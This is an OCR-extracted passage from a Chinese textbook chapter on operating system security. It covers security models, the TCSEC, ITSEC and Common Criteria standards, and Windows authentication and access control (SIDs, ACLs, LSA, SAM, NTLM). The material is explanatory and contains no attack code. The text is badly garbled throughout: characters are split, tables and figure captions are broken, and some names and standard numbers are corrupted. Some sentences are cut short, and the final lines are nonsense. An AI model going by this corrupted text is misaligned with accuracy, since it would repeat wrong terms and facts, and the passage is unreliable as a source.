安全 策略 是 指 有 关 管 理 、 保 护 和 发 布 敏感 信息 的 法 律 、 规 定 和 实施 细则 ， 是 用 来 描述 
人 们 如 何 存 取 文 件 或 其 他 信息 的 。 对 于 给 定 的 计算 机 主体 和 客体 ， 必 须 有 一 套 严格 而 科学 
的 规则 来 确定 一 个 主体 是 否 被 授权 获得 对 客体 的 访问 。 例 如 ， 可 以 将 安全 策略 定义 为 : 系 
统 中 的 用 户 和 信息 被 划分 为 不 同 的 层次 ， 一 些 级 别 比 另 一 些 级 别 高 ， 当 且 仅 当主 体 的 级 别 
低 于 或 等 于 客体 的 级 别 时 ， 主 体 才能 读 访 问 客体 ， 当 且 仅 当主 体 的 级 别 高 于 或 等 于 客体 的 
级 别 时 ， 主 体 才 能 写 访问 客体 。 

在 对 安全 策略 进行 研究 时 ， 人 们 将 安全 策略 抽象 成 安全 模型 ， 以 便于 用 形式 化 的 方法 
来 证 明 该 策略 是 安全 的 。 安 全 模型 是 对 安全 策略 所 表达 的 安全 需求 的 简单 、 抽 象 和 无 歧义 
的 描述 ， 它 为 安全 策略 和 安全 策略 实现 机 制 的 关联 提供 了 一 种 框架 。 安 全 模型 描述 了 对 某 
个 安全 策略 需要 用 哪 种 机 制 来 满足 ， 而 模型 的 实现 则 描述 了 如 何 把 特定 的 机 制 应 用 于 系统 
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中 ， 从 而 实现 某 一 特定 安全 策略 所 需 的 安全 保护 。 主 要 安全 模型 有 : Bell-LaPadula 模型 、 
Biba 模型 、Clark-Wilson 模型 、 中 国 墙 模型 等 。 

在 进行 操作 系统 设计 时 ， 操 作 系统 的 安全 部 分 是 按照 安全 模型 进行 设计 的 ， 但 由 于 设 
计时 对 安全 性 考虑 不 充分 或 在 实现 过 程 中 由 于 各 种 原因 ， 而 产生 了 一 些 出 乎 设计 者 意图 之 
外 的 性 质 ， 这 些 被 称 为 操作 系统 的 缺陷 。 特 别 是 近年 来 ， 随 着 各 种 系统 入 侵 和 攻击 技术 的 
不 断 发 展 ， 操 作 系统 的 各 种 缺陷 不 断 被 发 现 ， 其 中 最 为 典型 的 是 缓冲 区 溢出 缺陷 ， 几 乎 所 
有 的 操作 系统 都 不 同 程度 地 存在 。 因 此 ， 在 理解 操作 系统 安全 这 个 概念 时 ， 通 常 具 有 3 层 
含义 : 一 是 指使 用 具有 有 效 的 安全 体系 结构 的 操作 系统 ; 二 是 指 充分 利用 操作 系统 在 设计 
时 提供 的 权限 访问 控制 、 信 息 加 密 性 保护 、 完 整 性 鉴定 等 安全 机 制 所 实现 的 安全 ;三 是 指 
在 操作 系统 使 用 过 程 中 ， 通 过 系统 配置 ， 以 确保 操作 系统 尽量 避免 由 于 实现 时 的 缺陷 和 具 
体 应 用 环境 因素 而 产生 的 不 安全 因素 。 只 有 通过 这 3 个 方面 的 共同 努力 ， 才 能 最 大 限度 地 
保证 系统 的 安全 。 


6.1.2 ”操作 系统 安全 的 评估 


计算 机 系统 安全 评价 标准 是 一 种 技术 性 法 规 。 在 信息 安全 这 一 特殊 领域 ， 如 果 没 有 这 
一 标准 ， 与 此 相关 的 立法 、 执 法 就 会 有 失 偏颇 ， 最 终 会 给 国家 的 信息 安全 带 来 严重 后 果 。 
由 于 信息 安全 产品 和 系统 的 安全 评价 事 关 国 家 的 安全 利益 ， 因 此 许多 国家 在 充分 借鉴 国际 
标准 的 前 提 下 ， 积 极 制定 本 国 的 计算 机 安全 评价 认证 标准 。 下 面 分 别 介绍 国外 和 国内 主要 
的 计算 机 系统 安全 评估 标准 。 

1. 国外 安全 评估 标准 

1) 可 信 计 算 机 安全 评估 标准 

可 信 计 算 机 安全 评估 标准 (Trusted Computer System Evaluation Criteria，TCSEC) 又 称 为 
橘 皮 书 ， 是 计算 机 系统 安全 评估 的 第 一 个 正式 标准 ， 具 有 划时代 的 意义 。 该 标准 是 美国 国 
防 部 于 1985 年 制定 的 ， 最 初 只 是 军用 标准 ， 后 来 延伸 至 民用 和 领域， 为 计算 机 安全 产品 的 
评测 提供 了 测试 和 方法 ， 指 导 信息 安全 产品 的 制造 和 应 用 。 它 将 计算 机 系统 的 安全 划分 为 
4 个 等 级 、7 个 级 别 。 

(1) D 类 安全 等 级 : D 类 安全 等 级 只 包括 D1 一 个 级 别 。D1 的 安全 等 级 最 低 ，D1 系 
统 只 为 文件 和 用 户 提供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 ， 或 者 是 一 个 完 
全 没有 保护 的 网 络 。 

(2) C 类 安全 等 级 : 该 类 安全 等 级 能 够 提供 审慎 的 保护 ， 并 为 用 户 的 行动 和 责任 提供 
审计 能 力 。C 类 安全 等 级 可 划分 为 C1 和 C2 两 类 。C1 系统 的 可 信任 计算 基 (Trusted 
Computing Base，TCB) 通 过 将 用 户 和 数据 分 开 来 达到 安全 的 目的 。 在 Cl 系统 中 ， 所 有 的 
用 户 以 同样 的 灵敏 度 来 处 理 数据 ， 即 用 户 认为 C1 系统 中 的 所 有 文档 都 具有 相同 的 机 密 
性 。C2 系统 比 Cl 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ，C2 系统 的 用 户 分 别 
对 各 自 的 行为 负责 。C2 系统 通过 登录 过 程 、 安 全 事件 和 资源 隔离 来 增强 这 种 控制 。C2 系 
统 具有 C1 系统 中 所 有 的 安全 性 特征 。 

(3) B 类 安全 等 级 : B 类 安全 等 级 可 分 为 B1、B2 和 B3 三 类 。B 类 系统 具有 强制 性 保 
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护 功能 。 强 制 性 保护 意味 着 如 果 用 户 没有 与 安全 等 级 相连 ， 系 统 就 不 会 让 用 户 存 取 对 象 。 
B1 系统 满足 下 列 要 求 : 系统 对 网 络 控制 下 的 每 个 对 象 都 进行 灵敏 度 标 记 ; 系统 使 用 灵敏 度 
标记 作为 所 有 强制 访问 控制 的 基础 ;系统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标记 它 
们 ; 灵敏 度 标记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ， 当 系统 管理 员 创建 系统 或 者 
增加 新 的 通信 通道 和 IO 设备 时 ， 管 理 员 必须 指定 每 个 通信 通道 和 IO 设备 是 单 级 还 是 多 
级 ， 并 且 管 理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ， 所 有 直接 
面向 用 户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ) 都 必须 产生 标记 来 指示 关于 输出 对 象 的 灵 
敏 度 ， 系 统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ; 系统 必须 通过 审计 来 
记录 未 授权 访问 的 企图 。B2 系统 必须 满足 B1 系统 的 所 有 要 求 。 另 外 ，B2 系统 的 管理 员 
必须 使 用 一 个 明确 的 、 文 档 化 的 安全 策略 模式 作为 系统 的 可 信任 计算 基础 体制 。B2 系统 必 
须 满足 下 列 要 求 : 系统 必须 立即 通知 系统 中 的 每 一 个 用 户 所 有 与 之 相关 的 网 络 连 接 的 改 
变 ; 只 有 用 户 能 够 在 可 信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 计算 基础 体制 能 够 支持 独 
立 的 操作 者 和 管理 员 。B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监 
视 委托 管理 访问 能 力 和 抗 干扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 
求 : 除了 控制 对 个 别 对 象 的 访问 外 ，B3 必须 产生 一 个 可 读 的 安全 列表 ;每 个 被 命名 的 对 象 
提供 对 该 对 象 没有 访问 权 的 用 户 列表 说 明 ; B3 系统 在 进行 任何 操作 前 ， 要 求 用 户 进行 身份 
验证 ，B3 系统 验证 每 个 用 户 ， 同 时 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ， 设 计 者 必须 正 
确 区 分 可 信任 的 通信 路 径 和 其 他 路 径 ， 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 
安全 审计 跟踪 ; 可 信任 的 计算 基础 体制 支持 独立 的 安全 管理 。 

(4) A 类 安全 等 级 :A 类 系统 的 安全 级 别 最 高 。 目 前 ，A 类 安全 等 级 只 包含 Al 一 个 
安全 类 别 。A1l 类 与 B3 类 相似 ， 对 系统 的 结构 和 策略 不 作 特 别 要 求 。A1 系统 的 显著 特征 
是 : 系统 的 设计 者 必须 按照 一 个 正式 的 设计 规范 来 分 析 系 统 。 对 系统 分 析 后 ， 设 计 者 必须 
运用 核对 技术 来 确保 系统 符合 设计 规范 。Al 系统 必须 满足 下 列 要 求 : 系统 管理 员 必 须 从 
开发 者 那里 接收 到 一 个 安全 策略 的 正式 模型 ， 所 有 的 安装 操作 都 必须 由 系统 管理 员 进行 
系统 管理 员 进行 的 每 一 步 安装 操作 都 必须 有 正式 文档 。 

目前 ， 较 流行 的 几 种 操作 系统 的 安全 性 比较 如 表 6-1 所 示 。 


表 6-1 常见 操作 系统 的 安全 级 别 




















操作 系统 安全 级 别 

美国 Trusted Information Systems 公司 的 TMch 操作 系统 B3 
Unix Ware2.1/ES B2 
OSF/1 B1 
Windows NT/2000/2003/Vista C2 
Solaris C2 
Red Hat Linux Fedora 2/3 C2 
DoS、Windows 95/98 D 





2) 欧洲 的 安全 评价 标准 
欧洲 安全 评价 标准 (Information Technology Security Evaluation Criteria, ITSEC) 是 欧洲 
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多 国安 全 评价 方法 的 综合 产物 ， 应 用 领域 为 军队 、 政 府 和 商业 。 该 标准 将 安全 概念 分 为 功 
能 与 评估 两 部 分 。 功 能 准则 从 F1~F10 共 分 10 级 ，F1~F5 级 对 应 于 TCSEC 的 D 到 和 A 
F6~F10 级 分 别 对 应 数据 和 程序 的 完整 性 、 系 统 的 可 用 性 、 数 据 通信 的 完整 性 、 数 据 通信 
的 保密 性 以 及 机 密 性 和 完整 性 的 网 络 安全 。 评 估 准 则 分 为 6 级 ， 分 别 是 测试 、 配 置 控制 和 
可 控 的 分 配 、 能 访问 详细 设计 和 源码 、 详 细 的 脆弱 性 分 析 、 设 计 与 源码 明显 对 应 以 及 设计 
与 源码 在 形式 上 一 致 。 

3) 加 拿 大 的 评价 标准 

加 拿 大 评价 标准 (Canadian Trusted Computer Product Evaluation Criteria，CTCPEC) 是 专 
门 针对 政府 需求 而 设计 。 与 ITSEC 类 似 ， 该 标准 将 安全 分 为 功能 性 需求 和 保证 性 需要 两 部 
分 。 功 能 性 需求 共 划 分 为 4 个 大 类 : 机 密 性 、 完 整 性 、 可 用 性 和 可 控 性 。 每 种 安全 需求 又 
可 以 分 成 很 多 小 类 ， 来 表示 安全 性 上 的 差别 ， 分 级 条 数 为 0 一 5 级 。 

4) 美国 联邦 准则 

美国 联邦 准则 (Federal Criteria，FC ) 是 对 TCSEC 的 升级 ， 并 引入 了 “保护 轮廓 ”(PP) 
的 概念 。 每 个 轮廓 都 包括 功能 、 开 发 保证 和 评价 3 部 分 。FC 充分 吸取 了 ITSEC 和 
CTCPEC 的 优点 ， 在 美国 的 政府 、 民 间 和 商业 领域 得 到 广泛 应 用 。 

5) 国际 通用 准则 
国际 通用 准则 (Common Criteria，CC) 是 国际 标准 化 组 织 统一 现 有 多 种 准则 的 结果 ， 是 
目前 最 全 面 的 评价 准则 。1996 年 6 月 ，CC 第 一 版 发 布 ，1998 年 5 月 ，CC 第 二 版 发 布 ; 
1999 年 10 月 ，CC v2.1 版 发 布 ， 并 且 成 为 ISO 标准 。CC 的 主要 思想 和 框架 都 取 自 ITSEC 
和 FC， 并 充分 突出 了 “保护 轮廓 ”概念 。CC 将 评估 过 程 划 分 为 功能 和 保证 两 部 分 ， 评 估 
等 级 分 为 EAL1、EAL2、EAL3、EAL4、EAL5、EAL6 和 EAL7 共 7 个 等 级 。 每 一 级 均 需 
评估 7 个 功能 类 ， 分别 是 配置 管理 、 分 发 和 操作 、 开 发 过 程 、 指 导 文献 、 生 命 期 的 技术 支 
持 、 测 试 和 脆弱 性 评估 。 


2. 国内 安全 评估 标准 


国内 主要 是 采用 国际 标准 。 同 时 ， 为 了 加 快 和 适应 我 国信 息 安 全 发 展 的 需求 ， 公 安 部 
主持 制定 、 国 家 技术 标准 局 发 布 的 中 华人 民 共 和 国 国家 标准 GB17895 一 1999《 计 算 机 信息 
系统 安全 保护 等 级 划分 准则 》 已 经 正式 颁布 ， 并 于 2001 年 1 月 1 日 起 实施 。 该 准则 将 信 
息 系统 安全 分 为 5 个 等 级 ， 分 别 是 自主 保护 级 、 系 统 审计 保护 级 、 安 全 标记 保护 级 、 结 构 
化 保护 级 和 访问 验证 保护 级 。 主 要 的 安全 考核 指标 有 身份 认证 、 自 主 访问 控制 、 数 据 完 整 
性 、 审 计 、 隐 项 信道 分 析 、 客 体重 用 、 强 制 访问 控制 、 安 全 标记 、 可 信 路 径 和 可 信 恢 复 
等 ， 这 些 指标 涵盖 了 不 同 级 别 的 安全 要 求 。 
具体 的 安全 考核 指标 与 安全 级 别 的 对 应 关系 如 表 6-2 所 示 。 

















表 6-2 ”操作 系统 的 5 个 级 别 


安全 考核 指标 
自主 访问 控制 
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续 表 
安全 考核 指标 |。 第 一 级 第 四 级 第 五 级 
客体 重用 
审计 
强制 访问 控制 
安全 标记 
隐蔽 信道 分 析 
可 信 路 径 
可 信 恢 复 
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6.2 ”Windows 安全 技术 


从 1983 年 Microsoft 公司 宣布 Windows 的 诞生 ，Windows 已 经 走 过 了 30 多 年 的 历 
史 ， 目 前 其 在 全 球 桌 面 操 作 系统 市 场 上 的 占有 率 已 达 90% 以 上 ， 在 服务 器 操作 系统 市 场 上 
的 占有 率 也 达 20% 以 上 。 而 Windows 系列 操作 系统 在 受到 用 户 广泛 欢迎 的 同时 ， 其 安全 防 
护 问题 也 日 益 突出 。 

本 节 主 要 介绍 基于 NT 内 核 的 Windows 操作 系统 中 常用 的 安全 技术 及 安全 实现 ， 包 括 
身份 验证 与 访问 控制 、 文 件 系统 安全 、 注 册 表 安全 以 及 审核 与 日 志 等 4 个 方面 。 


6.2.1 身份 验证 与 访问 控制 


1， 基本 概念 


Windows 系统 内 置 支持 用 户 身 份 验证 (Authentication) 和 访问 控制 (Access Control) 等 安 
全 机 制 ， 而 身份 验证 是 访问 控制 的 基础 。 下 面 介 绍 与 身份 验证 和 访问 控制 相关 的 基本 概念 。 

1) 用 户 账 户 (Account) 

用 户 账户 是 一 种 参考 上 下 文 ， 操 作 系统 在 这 个 上 下 文 描述 符 中 运行 它 的 大 部 分 代码 。 
如 果 用 户 使 用 账户 凭据 (用 户 名 和 口令 ) 成 功 通过 了 登录 验证 ， 之 后 他 执行 的 所 有 命令 都 具 
有 该 用 户 的 权限 。 于 是 ， 执 行 代码 所 进行 的 操作 只 受 限 于 运行 它 的 账户 所 具有 的 权限 。 

用 户 账户 分 为 本 地 用 户 账户 和 域 用 户 账户 。 本 地 用 户 账 户 访问 本 地 计算 机 ， 只 在 本 地 
进行 身份 验证 ， 存 在 于 本 地 账户 数据 库 SAM(Security Account Manager) 中 。 域 用 户 账 户 用 
于 访问 网 络 资源 ， 存 在 于 活动 目录 (Active Directory) 中 。 

Windows 系统 常见 的 账户 如 表 6-3 所 示 。 


表 6-3 Windows 系统 的 常见 账户 


账户 名 说 明 





System 或 Local System | 拥有 本 地 计算 机 的 完全 控制 权 
Administrator 拥有 本 地 计算 机 的 完全 控制 权 ， 但 低 于 System 





用 于 偶尔 或 一 次 性 访问 的 用 户 ， 而 且 它 的 权限 是 相对 受 限 的 ， 默 认 禁 止 
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续 表 
账户 名 说 明 
IUSER 计算 机 名 | ms 的 匿名 访问 ， 是 Guests 组 成 员 
IWAM 计算 机 名 | ms 的 进程 外 应 用 程序 作为 这 个 账户 运行 ，Guests 组 成 员 
TSInternetUser 用 于 终端 服务 
Kibtet Kerberos 密 钥 分 发 中 心 账户 ， 只 在 域 控制 器 上 出 现 ， 默 认 是 禁止 的 
2) 组 (Group) 


组 是 用 户 账户 的 一 种 容器 ， 代 表 着 很 多 用 户 账户 的 集合 。 组 提供 了 一 种 方式 ， 可 以 将 
用 户 账户 组 织 成 若干 具有 类 似 安全 需求 的 用 户 组 ， 然 后 将 安全 权限 指派 给 组 ， 而 不 用 指派 
给 单独 的 用 户 。 一 个 用 户 账户 可 以 属于 一 个 组 、 多 个 组 或 是 不 属于 任何 组 。 

组 对 安全 性 管理 是 一 个 非常 有 价值 的 工具 。 要 确保 所 有 具有 相同 访问 需求 的 用 户 账户 
拥有 相同 的 权限 ， 通 过 使 用 组 就 可 以 简化 这 项 工作 。 

Windows 含有 一 些 内 置 的 组 ， 每 个 都 具有 预定 义 的 一 组 权力 、 权 限 及 限制 条 件 。 
Windows 系统 常用 的 组 如 表 6-4 所 示 。 


表 6-4 Windows 系统 常用 的 组 














组 名 说 明 

Administrators 功能 最 强大 的 组 ， 具 有 系统 的 完全 控制 权 

Power Users 含有 很 多 权限 ， 但 不 是 Administrators 组 所 具有 的 所 有 权限 

Users 用 于 不 需要 管理 系统 的 用 户 ， 只 有 很 有 限 的 权限 

Guests 为 偶尔 访问 的 用 户 和 来 宾 提 供 有 限 的 访问 权 

Backup Operators 提供 备份 及 恢复 文件 夹 、 文 件 所 需 的 权限 ， 这 些 文 件 中 也 含有 
组 中 成 员 若 不 具有 此 权限 就 不 能 访问 的 文件 

Replicator 组 成 员 可 以 管理 文件 的 域 间 复制 

Network Configuration Operators 组 成 员 可 以 安装 及 配置 网 络 组 件 

Remote Desktop Users 提供 通过 远程 桌面 连接 对 计算 机 的 访问 

HelpServices Group 允许 技术 支持 人 员 连 接 到 用 户 的 电脑 

Print Operators 在 域 控制 器 上 安装 和 利 载 设备 驱动 程序 

Everyone 当前 网 络 所 有 用 户 ， 包 括 Guests 和 来 自 其 他 域 的 用 户 


3) 强制 登录 (Mandatory Logon) 

Windows 2000/XP/2003 是 强制 登录 的 操作 系统 ， 要 求 所 有 的 用 户 使 用 系统 前 必须 登 
录 ， 通 过 验证 后 才 可 以 访问 资源 。 

4) 安全 标识 符 (Security Identifiers) 

安全 标识 符 又 称 SID， 是 标识 用 户 、 组 和 计算 机 账户 的 唯一 号 码 。 在 第 一 次 创建 账户 
时 ， 将 给 网 络 上 的 每 一 个 账户 发 布 一 个 唯一 的 SID。Windows 系统 的 内 部 进程 将 引用 账户 
的 SID 而 不 是 账户 的 用 户 或 组 名 。 如 果 创 建 一 个 账户 后 删除 ， 然 后 使 用 相同 的 用 户 名 创建 
另 一 个 账户 ， 则 新 账户 将 不 具有 授权 给 前 一 个 账户 的 权力 或 权限 ， 原 因 是 该 账户 具有 不 同 
的 SID 号 。 系 统 中 SID 以 48 位 数字 存储 ， 各 位 的 含义 如 图 6-1 所 示 。 


.ATAT. 
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版 本 号 颁发 机 构 RI 
1 ! 
S-1-5-21-310440588-250036847-580389505-5 
个 
标识 符 子 颁发 机 构 


6-1 SID 示例 


图 中 第 一 项 S 表示 该 字符 串 是 SID; 第 二 项 是 SID 的 版 本 号 ， 对 于 Windows 2000 来 说 ， 
这 个 就 是 1; 然后 是 标志 符 的 颁发 机 构 (identifier authority)， 对 于 Windows 2000 账户 ， 颁 发 机 
构 就 是 NT， 值 是 5。 然后 是 一 系列 的 子 颁发 机 构 ， 前 面 几 项 是 标志 域 ， 最 后 一 个 标志 着 域 
内 的 账户 和 组 ， 最 后 一 项 是 相对 标识 符 (Relative ID，RID)， 用 来 解决 SID 的 重复 问题 。 

5) 访问 令 牌 (Access Tokens) 

用 户 通过 验证 后 ， 登 录 进 程 会 给 用 户 一 个 访问 令 牌 ， 该 令 牌 相当 于 用 户 访问 系统 资源 
的 票证 、 当 用 户 试图 访问 系统 资源 时 ， 将 访问 令 牌 提供 给 Windows 系统 ， 然 后 Windows 
系统 检查 用 户 试图 访问 对 象 上 的 访问 控制 列表 。 如 果 用 户 被 允许 访问 该 对 象 ， 系 统 将 会 分 
配给 用 户 适 当 的 访问 权限 。 访 问 令 牌 是 用 户 在 通过 验证 的 时 候 由 登录 进程 所 提供 的 ， 所 以 
改变 用 户 的 权限 需要 注销 后 再 登录 ， 重 新 获取 访问 令 牌 。 

6) 安全 描述 符 (Security Descriptors) 

Windows 系统 中 每 个 对 象 都 有 一 个 安全 描述 符 ， 用 于 维护 对 象 的 安全 设置 。 安 全 描述 
符 包括 对 象 所 有 者 SID、 组 SID、 随 机 访问 控制 列表 (DACL)、 系 统 访问 控制 列表 (SACL)。 

7) 访问 控制 列表 (Access Control Lists) 

访问 控制 列表 有 两 种 ， 随 机 访问 控制 列表 (Discretionary ACL，DACL) 和 系统 访问 控制 
列表 (System ACL，SACL)。 

(1) 随机 访问 控制 列表 维护 用 户 、 组 以 及 它们 相应 的 权限 (允许 或 拒绝 )， 每 个 用 户 或 
组 被 指定 的 权限 都 记录 在 随机 访问 控制 列表 中 。 

(2) 系统 访问 控制 列表 包含 被 审核 的 对 象 事件 的 列表 。 

如 果 访 问 控制 列表 没有 明确 指定 ， 通 常 是 指 随机 访问 控制 列表 。 两 者 访问 控制 列表 的 









































区 别 如 图 6-2 所 示 。 
随机 访问 控制 列表 系统 访问 控制 列表 
用 户 A 用 户 A 
完全 控制 读 取 成 功 
组 A 组 A 
拒绝 访问 读 取 失败 
用 户 B 
修改 
































图 6-2 访问 控制 列表 
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8) 访问 控制 项 (Access Control Entries，ACE) 

访问 控制 列表 是 由 一 条 条 的 访问 控制 项 ACE) 组 成 的 ， 而 每 个 访问 控制 项 则 包含 用 户 
或 组 的 SID， 以 及 它们 对 于 对 象 的 权限 。 一 个 访问 控制 项 指定 一 个 对 象 上 分 配 的 一 种 权限 。 

访问 控制 项 有 允许 访问 或 拒绝 访问 两 种 类 型 。 在 访问 控制 列表 里 ， 拒 绝 访问 优先 。 这 
是 由 于 当 用 户 认证 检查 后 ， 同 时 搜索 相关 的 拒绝 访问 ACE 或 访问 控制 列表 的 最 后 项 ， 而 
不 管 哪个 在 前 面 ， 因 此 拒绝 访问 优 于 其 他 的 权限 。 

当 管理 工具 列 出 一 个 对 象 的 访问 权限 时 ， 是 按照 字母 顺序 从 用 户 开 始 ， 然 后 是 用 户 
组 ， 比 如 administrator 用 户 就 排 在 第 一 位 。 

6-3 是 一 个 对 象 的 访问 控制 项 举例 。 


出 版 社 文件 属性 
常规 | 共享 安全 ”| 自 定 义 


组 或 用 户 名 称 @) 
@ Adninistrator (ADMTH-DS4ABS4DA\Administrator) | 
给 Atninistraters DMTN-DS4A54DA\Administrators) 

















口 口 口 口 口 口 | 车 








确定 

















6-3 ”访问 控制 项 


2. Windows 安全 子 系统 


Windows 安全 子 系统 通过 检查 对 对 象 (包括 文件 、 文 件 夹 、LO 设备 、 进 程 、 内 存 等 ) 的 
所 有 访问 ， 以 确保 应 用 程序 或 用 户 不 会 在 未 经 适当 授权 的 情况 下 获得 访问 权限 。Windows 
安全 子 系统 (以 Windows Server 2003 为 例 ) 包 括 以 下 几 部 分 。 


Windows 登录 服务 (Winlogon)。 

图 形 化 标识 和 验证 组 件 (Graphical Identification and Authentication，GINA)。 
本 地 安全 授权 (Local Security Authority，LSA)。 

安全 支持 提供 者 接口 (Security Support Provider Interface，SSPI)。 
验证 包 (Authentication Packages)。 

安全 支持 提供 者 (Security Support Providers)。 

网 络 登 录 服 务 (Netlogon Service)。 

安全 账户 管理 器 (Security Account Manager，SAMD)。 


各 组 成 部 分 的 关系 如 图 6-4 所 示 ， 下 面 分 别 介绍 其 功能 。 
1) Winlogon 
负责 进行 安全 的 用 户 登录 和 交互 的 可 执行 文件 ， 启 动 登录 进程 。 具 体 完成 如 下 工作 : 
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桌面 锁定 、SAS(Secure Attention Sequence) 标 准 动作 的 识别 、SAS 标准 例 程 的 分 发 、 加 载 User 
Profile、 控 制 屏幕 保护 程序 、 支 持 多 种 网 络 服务 提供 者 、 查 找 GINA(MSGINA.dll)。 

2) GINA 

GINA 是 一 个 被 Winlogon 进程 在 启动 的 前 期 阶段 加 载 的 DLL 模块 ， 这 个 DLL 用 来 接 
收 用 户 名 和 密码 。GINA 负责 处 理 SAS 事件 并 激活 用 户 Shell。 作 用 : 可 以 实现 在 登录 之 前 
的 警告 提醒 框 ， 显 示 上 一 次 登录 用 户 名 ; 自动 登录 、 人 允许 关机 ; 激活 Userinit.exe 进程 。 

3) 本 地 安全 授权 (LSA) 

LSA 是 一 个 运行 映像 LSASS.EXE 的 用 户 态 进程 ， 它 负责 本 地 系统 安全 规则 (如 允许 用 
户 登 录 计算 机 的 规则 、 口 令 规则 、 授 予 用 户 和 组 的 权限 列表 以 及 系统 安全 审计 设置 )， 通 过 
访问 本 地 SAM(Security Accounts Manager) 数 据 库 ， 完 成 本 地 用 户 的 验证 ， 产生 系 统 访 问 令 
牌 (SAT， 系 统 访问 权 标 ); 此 外 ，LSA 还 负责 审计 功能 (向 事件 日 志 发 送 安 全 审计 信息 )。 

4) 安全 支持 提供 者 接口 (SSPD 

SSPI 遵循 RFC2743 和 RFC2744 的 定义 ， 提 供 一 些 安全 服务 的 API， 为 应 用 程序 和 服 
务 提供 请 求 安全 的 验证 连接 的 方法 。 

5) 验证 包 (Authentication Packages) 

验证 包 作 为 LSA 的 一 个 组 件 ， 可 以 为 真实 用 户 提供 验证 。 通 过 GINA 的 可 信 验 证 后 ， 
验证 包 返 回 用 户 的 SID 给 LSA， 然 后 将 其 放 在 用 户 的 访问 令 牌 中 。 

6) 安全 支持 提供 者 (SSP) 

安全 支持 提供 者 是 指 安装 驱动 程序 来 支持 额外 的 安全 机 制 。Windows Server 2003 默认 
安装 以 下 3 种 SSP。 

(1) Msnsspc.dll: 微软 网 络 (MSN) 挑 战 /响应 验证 模块 。 

(2) Msapsspc.dll: 分 布 式 密码 验证 (DPA) 挑 战 /响应 验证 模块 。 

(3) Schannel.dll: 利用 证 书 授权 机 构 (Versign) 所 发 布 的 证 书 来 实行 验证 。 这 种 验证 方 
式 通常 在 安全 套 接 层 (SSL) 和 私有 通信 技术 (PCT) 协 议 连接 中 使 用 。 

7) 网 络 登录 服务 (Netlogon Service) 

网 络 登录 服务 必须 为 认证 的 正确 传输 建立 一 个 安全 的 通道 ， 为 了 达到 这 种 效果 ， 要 定 
位 一 个 域 控制 器 来 建立 安全 通道 。 最 后 ， 通 过 这 条 安全 通道 来 传递 用 户 的 证 书 ， 再 以 用 户 
SID 及 用 户 权限 的 形式 接收 域 控制 器 的 响应 。 

8) 安全 账户 管理 器 (SAM) 

安全 账户 管理 器 是 用 来 保存 用 户 账户 和 口令 的 数据 库 。 口 令 在 SAM 中 通过 单 向 函数 
加 密 ， 以 保证 安全 性 。SAM 文件 存放 在 “%systemroot%\system32\config\sam”( 在 域 服务 
器 中 ，SAM 文件 存放 在 活动 目录 内 ， 默 认 地 址 为 “%system32%wntds\ntds.dit”)。 

3. NTLM 验证 

Windows 远程 登录 身份 验证 方式 经 历 了 一 个 发 展 时 期 ， 早 期 SMB 验证 协议 在 网 络 上 
传输 明文 口令 ， 安 全 性 得 不 到 保障 。 后 来 出 现 了 LAN Challenge/Response( 挑 战 /响应 ) 验 证 
机 制 (简称 LM)， 它 的 验证 机 制 也 很 简单 ， 很 容易 被 破解 。 后 来 Microsoft 提出 了 Windows 
NT 挑战 /响应 验证 机 制 ， 称 为 NTLM。 现 在 已 经 有 了 更 新 的 NTLM v2 以 及 Kerberos 验证 
体系 。 
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具体 各 种 验证 方法 与 系统 环境 的 对 应 关系 如 表 6-5 所 示 。 
表 6-5 远程 登录 验证 方法 


系统 环境 
Windows 9x 
Windows NT4 SP3 以 后 
Windows NT4 SP4 以 后 
Windows 2000 以 后 





Kerberos 


因为 应 用 的 普遍 性 ， 下 面具 体 介 绍 基于 NTLM 的 身份 验证 过 程 。 

@ ”客户 机 向 服务 器 发 出 连接 请 求 。 

@ ”服务 器 向 客户 端 发 出 一 个 8 字 节 的 随机 值 (挑战 ，Challenge); 

@ 客户 端 使 用 用 户口 令 的 散 列 对 它 进行 加 密 散 列 函数 运算 ， 并 将 这 个 新 计算 出 的 值 
传 回 服务 器 (应 答 )。 

@ ”服务 器 从 本 地 SAM 或 活动 目录 中 取出 用 户口 令 的 散 列 ， 对 刚 发 送 的 挑战 进行 散 
列 运算 ， 并 将 结果 与 客户 端的 应 答 相 比较 。 

@ 如 果 应 答 与 服务 器 的 计算 结果 匹配 ， 服 务 器 认为 客户 机 用 户 使 用 正确 的 明文 
口令 。 

@ 于 是 , 在 Windows 认证 过 程 中 ， 没 有 口令 通过 网 络 传输 ， 即 使 是 以 加 密 的 形式 
也 没有 ， 从 而 极 大 提高 了 远程 登录 身份 验证 的 安全 性 。 

具体 的 NTLM 安全 验证 过 程 如 图 6-5 所 示 。 


4. 账户 和 密码 安全 设置 


1) 将 用 户 账户 指派 到 安全 组 
账户 安全 的 首要 任务 是 确保 只 有 必需 的 账户 被 使 用 ， 而 且 每 个 账户 仅 有 满足 他 们 完成 
工作 的 最 小 权限 。Windows 系统 内 置 的 安全 组 具有 预定 义 的 权利 和 权限 ， 可 以 通过 为 账户 
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指派 组 来 限制 账户 的 权限 ， 防 止 账户 越权 现象 的 发 生 。 

要 将 一 个 账户 只 指派 到 一 个 组 中 ， 可 以 使 用 账户 管理 工具 来 实现 。 如 果 要 将 一 个 账户 
添加 到 一 个 以 上 的 组 中 ， 就 必须 使 用 “用 户 账户 ”对 话 框 或 Net Localgroup 命令 。 

(1) 在 “用 户 账户 ”对 话 框 中 选择 “用 户 ” 选 项 卡 再 双击 您 要 修改 的 账户 名 称 。 在 出 
现 的 属性 对 话 框 中 ， 切 换 到 “组 成 员 ” 选 项 卡 再 选择 一 个 安全 组 ， 如 图 6-6 所 示 。 


包 是 到 本 子 或 拒绝 用 户 访问 您 的 计算 机 还 可 以 更 改 其 密 
和 甘地 六 
